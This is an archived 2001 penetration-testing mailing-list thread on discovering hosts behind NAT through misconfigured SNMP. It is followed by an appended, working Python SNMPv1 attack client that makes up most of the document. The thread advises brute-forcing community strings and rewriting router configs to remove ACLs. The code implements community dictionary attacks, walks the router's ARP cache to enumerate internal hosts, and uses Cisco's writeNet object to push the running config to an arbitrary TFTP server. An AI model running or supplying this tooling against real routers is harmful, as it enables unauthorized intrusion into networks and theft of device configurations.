Penetration Testing: RE: Discovering hosts behind NAT

From: Dawes, Rogan (ZA - Johannesburg) <rdawes_at_deloitte.co.za>
Date: Thu, 24 May 2001 07:46:40 +0200

That's a good suggestion.

If you can get writable SNMP access (try ADMsnmp as a nice bruteforcer), you
may also be able to get it to upload its config to you. Michal Zalewski
(IIRC) made a script that would set the appropriate SNMP variables, start a
TFTP server, and receive a config file. Having done that, you can modify it
to suit (remove ACLs, etc.) and upload it again.

Rogan

-----Original Message-----
From: Javier Fernandez-Sanguino Peña [mailto:jfernandez_at_sgi.es]
Sent: 23 May 2001 09:29
To: Franklin DeMatto
Cc: pen-test_at_securityfocus.com
Subject: Re: Discovering hosts behind NAT

>
> There are two known network devices: a Cisco, which seems totally silent,
> and a Wellfleet router.
>

        Have you tried SNMP access? First try to check if the SNMP ports (UDP)
are open (nmap -sU) and then do a dictionary attack against the router. A
common misconfiguration is to have SNMP open to the outside world and with
well-known communities.
        If so, you could probably get the information the router holds in its
internal tables and (maybe) configure it to allow you access to the "hidden"
network.

        Javi
Received on May 24 2001
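The procedure the two messages describe, as an added example that is not code from the thread or from either author: a minimal SNMPv1 client written from scratch in Python (standard library only), so that the community "dictionary attack", the walk of the router's ARP cache (the "information the router holds in its internal tables", which is where the hosts behind the NAT show up) and the config export Rogan describes can be seen byte for byte. The export is a Set of the legacy Cisco writeNet object (.1.3.6.1.4.1.9.2.1.55.<tftp-server-ip>), which makes older IOS images push their running config to a TFTP server at that address; the code assumes the target still honours that object, which newer IOS does not. Hosts, community lists and the SAMPLE_RESPONSE bytes are constructed for the example.

```python
# Hand-rolled SNMPv1 over UDP: community probing, ARP-cache walk and the legacy Cisco writeNet
# config export.  Added example, not the thread's code; hosts, communities and SAMPLE_RESPONSE are constructed.
import random
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"
ARP_NET_ADDRESS = "1.3.6.1.2.1.4.22.1.3"  # ipNetToMediaNetAddress (RFC 1213 ARP cache)
WRITE_NET = "1.3.6.1.4.1.9.2.1.55"        # OLD-CISCO-SYS-MIB writeNet (legacy IOS)
GET_REQUEST, GET_NEXT, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA1, 0xA2, 0xA3

def tlv(tag, payload):  # BER TLV; long-form length once the payload reaches 128 bytes
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(body)]) + body + payload

def ber_int(value):  # non-negative INTEGER, minimal length with the sign bit clear
    return tlv(0x02, value.to_bytes((value.bit_length() + 8) // 8, "big"))

def ber_oid(dotted):  # first two arcs packed as 40*a+b, the rest base-128, MSB first
    arcs = [int(a) for a in dotted.split(".")]
    out = bytes([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytes([arc & 0x7F])
        while arc := arc >> 7:
            chunk = bytes([0x80 | (arc & 0x7F)]) + chunk
        out += chunk
    return tlv(0x06, out)

def build_request(community, oid, request_id, pdu_type=GET_REQUEST, value=None):
    # Message ::= SEQUENCE { version 0, community, PDU { id, 0, 0, varbinds } }; one varbind,
    # NULL for Get/GetNext or an OCTET STRING for Set.  The community travels in cleartext.
    varbind = tlv(0x30, ber_oid(oid) + (tlv(0x05, b"") if value is None else tlv(0x04, value)))
    pdu = tlv(pdu_type, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)

def children(buf):  # yield (tag, payload) for every TLV in a constructed payload
    pos = 0
    while pos < len(buf):
        tag, length, pos = buf[pos], buf[pos + 1], pos + 2
        if length & 0x80:  # long form: low 7 bits count the length octets that follow
            n = length & 0x7F
            length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
        yield tag, buf[pos:pos + length]
        pos += length

def decode_oid(payload):  # inverse of ber_oid, for the payload only
    arcs, acc = [payload[0] // 40, payload[0] % 40], 0
    for b in payload[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs, acc = arcs + [acc], 0
    return ".".join(map(str, arcs))

def parse_response(datagram):
    """GetResponse -> (community, request_id, error_status, [(oid, value), ...])."""
    (_, version), (_, community), (pdu_tag, pdu) = children(next(children(datagram))[1])
    if version != b"\x00" or pdu_tag != GET_RESPONSE:
        raise ValueError("not an SNMPv1 GetResponse")
    (_, rid), (_, err), _, (_, vbl) = children(pdu)  # third field is error-index
    bindings = []
    for _, vb in children(vbl):
        (_, oid), (vtag, val) = children(vb)  # tag 0x40 = IpAddress, four raw octets
        bindings.append((decode_oid(oid), socket.inet_ntoa(val) if vtag == 0x40 else val))
    return (community.decode(errors="replace"), int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big"), bindings)

def query(host, community, oid, pdu_type=GET_REQUEST, value=None, timeout=2.0):
    # SNMPv1 agents silently drop a wrong community, so a reply carrying our id is the proof.
    rid = random.randrange(1, 0x7FFFFFFF)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_request(community, oid, rid, pdu_type, value), (host, 161))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return None
    _, got_rid, err, bindings = parse_response(data)
    return bindings if got_rid == rid and err == 0 else None

def walk_arp_cache(host, community):
    # GetNext through ipNetToMediaNetAddress: every row is a live host on the NATed side.
    hosts, oid = [], ARP_NET_ADDRESS
    while (row := query(host, community, oid, GET_NEXT)) and \
            row[0][0].startswith(ARP_NET_ADDRESS + "."):
        oid, ip = row[0]
        hosts.append(ip)
    return hosts

def export_config(host, rw_community, tftp_server, filename):
    # Rogan's trick: Set writeNet.<tftp-server-ip> = filename and legacy Cisco IOS pushes its
    # running config to that TFTP server (assumes OLD-CISCO-SYS-MIB is still honoured).
    return query(host, rw_community, WRITE_NET + "." + tftp_server, SET_REQUEST, filename.encode()) is not None

# Constructed GetResponse (community "public", id 1): sysDescr.0 = "Test router", ARP row for 192.168.1.10.
SAMPLE_RESPONSE = bytes.fromhex("304b02010004067075626c6963a23e0201010201000201003033"
                                "301706082b06010201010100040b5465737420726f75746572"
                                "301806102b06010201041601030181408128010a4004c0a8010a")
```

Discovery is still the thread's first step (nmap -sU -p 161 against the router), because query() cannot tell a filtered port from a wrong community: an SNMPv1 agent answers neither. The dictionary attack is then `[c for c in wordlist if query(router, c, SYS_DESCR)]`, which is what ADMsnmp does faster; a read-only hit feeds walk_arp_cache(), a read-write hit feeds export_config(), which needs a TFTP server already listening on the address you pass in. Every one of these packets carries the community in cleartext, which is why a writable community reachable from the outside is equivalent to owning the router.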
